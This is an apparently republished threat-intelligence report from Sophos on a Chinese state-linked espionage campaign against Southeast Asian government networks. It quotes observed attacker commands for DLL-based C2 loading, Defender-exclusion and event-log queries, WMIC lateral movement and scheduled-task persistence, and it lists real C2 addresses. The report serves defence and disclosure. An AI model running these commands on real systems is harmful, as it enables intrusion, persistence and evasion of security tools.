{"id":25195,"date":"2024-09-12T11:22:08","date_gmt":"2024-09-12T19:22:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2024\/09\/12\/news-18925\/"},"modified":"2024-09-12T11:22:08","modified_gmt":"2024-09-12T19:22:08","slug":"news-18925","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2024\/09\/12\/news-18925\/","title":{"rendered":"Crimson Palace returns: New Tools, Tactics, and Targets\u00a0"},"content":{"rendered":"<p><strong>Credit to Author: gallagherseanm| Date: Tue, 10 Sep 2024 10:00:54 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><span data-contrast=\"auto\">After a brief break in activity, Sophos X-Ops continues to observe and respond to what we assess with high confidence as a Chinese state-directed cyberespionage operation targeting a prominent agency within the government of a Southeast Asian nation.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">In the process of investigating that activity, which we track as Operation Crimson Palace, Sophos Managed Detection and Response (MDR) found telemetry indicating the compromise of additional<\/span> <span data-contrast=\"auto\">government organizations in the region, and has detected related activity from these existing threat clusters in other organizations in the same region. 
The attackers consistently used other compromised organizational and public service networks in that region to deliver malware and tools under the guise of a trusted access point.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\"><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-sophos-threat-hunting-unveils-multiple-clusters-of-chinese-state-sponsored-activity-targeting-southeast-asia\/\">Our previous report<\/a> covered activity from three associated security threat activity clusters (STACs) connected to the cyberespionage activity: Cluster Alpha (STAC1248), Cluster Bravo (STAC1870), and Cluster Charlie (STAC1305), all seen between March and August 2023. All three threat clusters operating inside the estate of the targeted agency went dormant in August 2023. <\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">However, Cluster Charlie resumed activity several weeks later. This activity, which included a previously undocumented keylogger which we have named &#8220;TattleTale,\u201d marked the beginning of a second phase and expansion of the intrusion activity throughout the region, which remains ongoing.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos MDR also observed a series of detections that align with the tooling used by Cluster Bravo at entities outside the government agency covered in our initial report, including two non-governmental public service organizations and multiple additional organizations, all based in the same region. 
Those detections included telemetry that showed the use of one organization&#8217;s\u00a0 systems as a C2 relay point and a staging ground for tools, as well as the staging of malware on another organization&#8217;s compromised Microsoft Exchange server.\u00a0\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<figure id=\"attachment_957252\" aria-describedby=\"caption-attachment-957252\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957252 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg\" alt=\"\u00a0Figure 1. The three security threat activity clusters observed during the initial phase of Operation Crimson Palace and their overlap with previously reported threat actors and with each other, March-August 2023\u00a0\u00a0\" width=\"640\" height=\"562\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg 900w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg?resize=300,264 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg?resize=768,675 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957252\" class=\"wp-caption-text\"><em>Figure 1. 
The three security threat activity clusters observed during the initial phase of Operation Crimson Palace and their overlap with previously reported threat actors and with each other, March-August 2023<\/em><\/figcaption><\/figure>\n<h2><span data-contrast=\"none\">Cluster Bravo, expanded<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">While Cluster Bravo was only briefly active on the network of the organization covered in our first report, Sophos X-Ops subsequently detected activity associated with Cluster Bravo on the networks of at least 11 other organizations and agencies in the same region. In addition, Sophos identified multiple organizations whose infrastructure was used for malware staging including one government agency. The threat actors were precise in how they leveraged these compromised environments for hosting, making sure to always use an infected organization within the same vertical for their attacks.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This new activity spanned from January to June of 2024, and included two private organizations with government-related roles.\u00a0 The affected organizations represent a broad swath of the targeted government&#8217;s critical functions.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h2><span data-contrast=\"none\">Cluster Charlie, renewed<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">Cluster Charlie went quiet in August 2023 after Sophos blocked <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-c2\"><span data-contrast=\"none\">its custom C2 implants (PocoProxy)<\/span><\/a><span 
data-contrast=\"auto\">. However, the actors behind the intrusion eventually returned with new techniques at the end of September.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This began with attempts to evade blocks by switching to different C2 channels, and with the Cluster Charlie actor varying how it deploys implants.\u00a0 These changes included, as we noted in our previous report, using a custom malware loader called <\/span><a href=\"https:\/\/www.sentinelone.com\/labs\/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector\/\"><span data-contrast=\"none\">HUI loader<\/span><\/a><span data-contrast=\"auto\"> (identified by Sentinel Labs) to inject a Cobalt Strike beacon into the Remote Desktop utility mstsc.exe.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">However, in September, the attackers behind Cluster Charlie modified their activities again in several ways:<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">They employed open source and off-the-shelf tools to re-establish their presence after Sophos discovered and blocked their custom tools.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">They leveraged numerous tools and techniques that had previously been part of the other threat activity clusters we had observed.\u00a0\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/li>\n<\/ul>\n<figure id=\"attachment_957274\" aria-describedby=\"caption-attachment-957274\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957274 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png\" alt=\"Figure 2: A timeline showing how Cluster Charlie-connected activity resumed in September 2023 after being disrupted in August\u00a0\" width=\"640\" height=\"337\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png 3113w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=300,158 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=768,405 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=1024,539 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=1536,809 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=2048,1079 2048w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957274\" class=\"wp-caption-text\"><em>Figure 2: Cluster Charlie-connected activity resumed in September 2023 after being disrupted in August <span style=\"font-size: 
1em\">\u00a0<\/span><\/em><\/figcaption><\/figure>\n<p><span data-contrast=\"auto\">Exfiltration of data of intelligence value was still an objective after the resumption of activity. However, much of their effort appeared to be focused on re-establishing and extending their foothold on the target network by bypassing EDR software and rapidly re-establishing access when their C2 implants had been blocked.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">September 2023 onward: Web shells and open-source tools<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">With their C2 tools blocked by Sophos, the attackers took a new approach. Using previously stolen credentials, the attackers deployed a web shell to a web application server using its built-in file upload feature. The attacker performed a methodical investigation of the web app server\u2019s configuration file and virtual directories to locate the web application\u2019s DLL. They then used the web shell to execute commands on the targeted web app server. This included copying the application&#8217;s dynamic linking library (DLL) to a web documents folder and disguising it as a PDF to allow it to be retrieved through the application, using credentials previously tied to Cluster Charlie activity.\u00a0\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">All this reconnaissance and collection activity occurred over an extremely short timeframe\u2014under 45 minutes.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">They returned to the compromised web application server in November, using the web shell to deploy the open-source Havoc C2 framework to support reconnaissance activity. 
This server went offline shortly afterward, and we were unable to gather further telemetry about the attackers&#8217; activities. However, Sophos MDR would later find the same web application exploited on other servers. For the next several months, the Cluster Charlie threat actor would routinely deploy a web shell on other hosts across the targeted network before downloading Havoc payloads.\u202f<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">In November, for example, the attackers used the Havoc tool to inject code into other processes, which would in turn deploy the open-source SharpHound tool for Active Directory infrastructure mapping.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This activity demonstrates a continued interest by the actors behind Cluster Charlie in mapping the environment&#8217;s infrastructure topography from multiple perspectives. In June 2023, <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-charlie\"><span data-contrast=\"none\">Cluster Charlie performed an in-depth capture<\/span><\/a><span data-contrast=\"auto\"> of the target organization\u2019s successful login events (event ID 4624) via PowerShell commands. They followed this up with a ping sweep of the IP addresses associated with the locations of those successful logins, mapping the organization&#8217;s users to the network\u2019s IP address space. The use of SharpHound would provide additional knowledge about the organization\u2019s topology, including details of the permissions within the domain assigned to these mapped users. 
<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">We have continued to see the threat actors shift to open-source tools when their own tooling for C2 or MDR evasion have failed over this second phase of activity. The off-the-shelf and open-source tools have included:<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">October and November 2023: Cross-pollination of tactics<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">As with our previous observations, the actors behind the new wave of activity relied heavily on DLL sideloading, using a malicious dynamic link library with function names matching those used by legitimate, signed executables and placing them in a directory where they would be found and loaded by those executables. We also saw the actors use tactics we had previously observed as part of other threat activity clusters, reinforcing our assessment that all the previous activity was orchestrated by the same overarching organization.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><span data-contrast=\"auto\">In October, Cluster Charlie was observed deploying additional C2 tooling by using DLL hijacking to abuse legitimate software downloaded by the operators to make a vulnerable executable available for use. 
The attackers used credentials obtained from an unmanaged device, and then used the unmanaged device to launch a remote attack against a targeted system using the Impacket atexec module\u2014a tactic used as part of the Cluster Alpha activity <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-lateral\"><span data-contrast=\"none\">covered in our previous report<\/span><\/a><span data-contrast=\"auto\">.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The atexec module was used to remotely configure a scheduled task on the targeted system. That task executed Trend Micro&#8217;s Platinum Watch Dog (ptWatchDog.exe) with a sideloaded malicious version of the tmpblglog.dll library; this was used to ping an IP address hosted by an in-country telecommunications company. Because atexec was run from an unmanaged device, we were only able to identify it by telemetry, and no sample could be collected.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">A week later, Sophos observed the actor connecting to the same IP address at the telecommunications company from a different device on the victim&#8217;s network, using an alternative DLL sideloading combination. In this case, the attacker deployed a copy of the legitimate Windows .NET Framework component mscorsvw.exe, located within the C:\\Windows\\Help\\Help directory, to sideload a malicious payload (mscorsvc.dll) and generate network connections to the same telecom company on TCP port 443.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">During these network connections, Sophos observed the creation of a new machine authentication key. 
This suggests that the threat actor attempted to RDP from a device external to the targeted organization&#8217;s environment. Investigation of the remote IP via the <\/span><a href=\"https:\/\/www.shodan.io\/dashboard\"><span data-contrast=\"none\">Shodan<\/span><\/a><span data-contrast=\"auto\"> vulnerability search engine found an open RDP server user authentication screen on that remote device. The attackers consistently used other compromised networks in the organization&#8217;s region to move laterally within the network.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">On November 3, Sophos MDR again observed the actors using atexec from an unmanaged device on the network to execute a malicious file (C:\\ProgramData\\mios.exe) on a targeted system, generating internal and external communications:<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<ul>\n<li><span data-contrast=\"auto\">Internal Comms: C:\\Windows\\system32\\cmd.exe \/C &quot;c:\\programdata\\mios.exe 172.xx.xxx.xx 65211&quot;<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"auto\">External Comms: c:\\programdata\\mios.exe 178.128.221.202 443 (Digital Ocean, Singapore)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-contrast=\"auto\">Sophos couldn&#8217;t obtain a sample of this malicious executable.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<figure id=\"attachment_957275\" aria-describedby=\"caption-attachment-957275\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a 
href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957275 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png\" alt=\"Figure 3: A map of the flow of attack chains used by the threat actor during the second phase of the intrusion (click to enlarge)\u00a0\" width=\"640\" height=\"535\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png 4352w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=300,251 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=768,643 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=1024,857 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=1536,1285 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=2048,1713 2048w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957275\" class=\"wp-caption-text\"><em>Figure 3: A map of the flow of attack chains used by the threat actor during the second phase of the intrusion (click to enlarge)<\/em><\/figcaption><\/figure>\n<h3><span data-contrast=\"none\">November and December 2023, part 1: Service hijacking<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">Also in November, we observed the threat actor searching for multiple services that they could exploit for DLL sideloading, followed by DLL hijacking of existing services to set up a custom backdoor. 
Their first step was using Microsoft&#8217;s Service Control utility (sc.exe) to collect information about services that they could potentially use to host a malicious DLL:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>sc query diagtrack\nsc query appmgmt\nsc query AxInstSV\nsc query swprv<\/pre>\n<p><span data-contrast=\"auto\">In this instance, the actor then replaced the legitimate Volume Shadow Copy Service DLL (C:\\System32\\swprv.dll) with their own malicious payload, further obfuscating their deployment. They did this by using a compromised administrative account to modify the permissions on the existing DLL from File Explorer, before moving their own (malicious) copy into the System32 folder.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos MDR had <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#prior-compromise\"><span data-contrast=\"none\">observed similar activity in December 2022<\/span><\/a><span data-contrast=\"auto\"> in a prior compromise of the agency, uncovered as Sophos endpoint protection was first deployed on the agency&#8217;s network. 
The artifacts of that activity showed that an attacker had\u00a0 leveraged DLL stitching to create two large DLLs (swprvs.dll and appmgmt.dll).\u00a0 <\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Upon execution of the Shadow Copy Service from svchost.exe, the malicious swprv.dll was observed making repeated DNS requests and network connections to the following domains and IP addresses:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<ul>\n<li><span data-contrast=\"none\">103.19.16.248:443 \/\/ dmsz.org (geolocated in Philippines)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"none\">103.56.5.224:443 \/\/ cancelle.net (geolocated in Philippines)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"none\">49.157.28.114:443 \/\/ gandeste.net (geolocated in Philippines)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-contrast=\"none\">In December, the actors used this sideloading technique to run malware that communicated with the IP address 123.253.35.100 (geolocated in Malaysia), through the Internet Explorer browser process iexplore.exe. According to analysis from SophosLabs, the DLL was designed to change firewall proxy settings and was observed creating a command shell to complete discovery. 
The DLL contained a suspicious string that appears to reveal a file path on the malware creator&#8217;s development computer (E:\\Masol_https\\190228\\x64\\Release\\Masol.pdb).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">In an example of similar yet divergent tradecraft, both Cluster Charlie and Cluster Alpha chose to deploy some of their payloads using service DLL sideloading; however, the service targeted by Cluster Charlie, the Volume Shadow Copy Service, natively had the permissions that Cluster Alpha had to add to the IKEEXT (IKE and AuthIP IPsec Keying Modules) service in June 2023, as described in our <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\"><span data-contrast=\"none\">Part 1 Technical Deep Dive<\/span><\/a><span data-contrast=\"none\">.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">November and December 2023, part 2: Evasive action, EDR evasion, and deeper reconnaissance<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">In mid-November, the same web application server that had been attacked in September was compromised again, with the threat actor using credentials stolen from an unmanaged device and a dropped web shell. 
The attackers used the shell to execute rundll32.exe, injecting a malicious Havoc DLL (with its file extension changed to .pdf) into backgroundtaskhost.exe, a Windows component responsible for executing the Windows virtual assistant (Cortana):<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>rundll32 C:\\inetpub\\wwwroot\\idocs_api\\Temp\\&lt;REDACTED&gt;\\DOC20231100001603KMAP.pdf,Start<\/pre>\n<p><span data-contrast=\"auto\">This DLL communicated with the attackers\u2019 C2 server (107.148.41.114, geolocated in the United States).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Next, the attackers ran the following command to check whether an RDP login had succeeded, searching the Windows Event Logs for Remote Connection Manager event ID 1149:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>\/c wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager\/Operational \/rd:true \/f:text \/q:*[System[(EventID=1149)]] &gt;&gt; c:\\windows\\temp\\1.txt<\/pre>\n<p><span data-contrast=\"auto\">This query would have returned Windows events signaling successful establishment of a Terminal Services remote connection session. 
The Havoc DLL then sent a ping command back to its C2.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Next, the injected process used WMIC to query Windows Defender exclusion paths, which would have given them information about what directories and file types were not scanned by Defender\u2014locations that could theoretically be used to evade malware protection.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>\/c WMIC \/NAMESPACE:\\\\root\\Microsoft\\Windows\\Defender PATH MSFT_MpPreference get ExclusionPath<\/pre>\n<p><span data-contrast=\"none\">It also queried the Sophos registry keys to better understand the &#8220;PolicyConfiguration,&#8221; &#8220;threat policy,&#8221; and &#8220;Poll Server&#8221; registry values, as well as using cmd.exe to query the status of &#8220;SophosHealthClient.exe&#8221;. This reveals the security policy configuration for the endpoint, the status of Sophos protection on the device, and the URL that the endpoint protection software polls for configuration setting changes. 
At the end of the querying, the threat actor used the following command to identify exclusions, permitted items, and blocked items in the configuration:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>findstr \/i \/c:exclude \/c:whitelist \/c:blocklist<\/pre>\n<p><span data-contrast=\"none\">The polling server data could conceivably be used by malware such as <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\"><span data-contrast=\"none\">EagerBee<\/span><\/a><span data-contrast=\"none\"> (as seen in <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-alpha\"><span data-contrast=\"none\">Cluster Alpha activity documented in our last report<\/span><\/a><span data-contrast=\"none\">) to block telemetry and updates for the endpoint in the future, though there was no evidence of that happening here.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Also in November, using a compromised administrative account, the attackers used a command shell session spawned from the malicious DLL to move laterally via WMIC, and to deploy the open-source SharpHound tool as a DLL for Active Directory infrastructure mapping.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>\/c wmic \/node:172.xx.xxx.xxx \/password:\"&lt;REDACTED&gt;\" \/user:\"&lt;REDACTED&gt;\" process call create \"cmd \/c C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start\"<\/pre>\n<p><span data-contrast=\"none\">The actor then used the credentials to gain access to one of the organization&#8217;s hypervisors and created a scheduled task, which executed another malicious DLL, this one masquerading as an .ini file, to connect to the same external C2 IP as the DLL masquerading as a PDF.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>schtasks \/create \/tn Microsoft\\Windows\\Clip2 \/tr \"rundll32 C:\\programdata\\vmnatTestlog.ini,Start\" \/ru System \/sc minute \/mo 90 \/f<\/pre>\n<p><span data-contrast=\"none\">This scheduled task allowed the attackers to make another pivot from the hypervisor to another system to execute SharpHound, using an administrative account previously tied to Cluster Charlie.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre>\/c schtasks \/create \/s 172.xx.xxx.xxx \/p \"&lt;REDACTED&gt;\" \/u \"&lt;REDACTED&gt;\" \/tn Microsoft\\Windows\\Clip2 \/tr \"C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start\" \/ru System \/sc minute \/mo 90 \/f<\/pre>\n<h3><span data-contrast=\"none\">December 2023: Collection and exfiltration<\/span><span 
data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">In December, the attackers launched a range of reconnaissance and collection efforts. This included capturing administrator credentials and data for specific users, as well as pinging user accounts and machines that we observed the attackers reconnoitering during\u00a0 <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-discovery\"><span data-contrast=\"none\">previous Cluster Charlie activity in June 2023<\/span><\/a><span data-contrast=\"none\">. During this time, the actors were conducting targeted espionage activity in which they were capturing sensitive documents, keys for cloud infrastructure (including disaster recovery and backup), other critical authentication keys and certificates, and configuration data for much of the agency\u2019s IT and network infrastructure.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h2><span data-contrast=\"none\">2024: Picking up the tempo<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><span data-contrast=\"none\">In 2024, it became apparent that the threat actors had begun to rapidly cycle through C2 channels to maintain and manage persistent access as Sophos discovered and blocked existing C2 implants. They also changed how they deployed malicious payloads. 
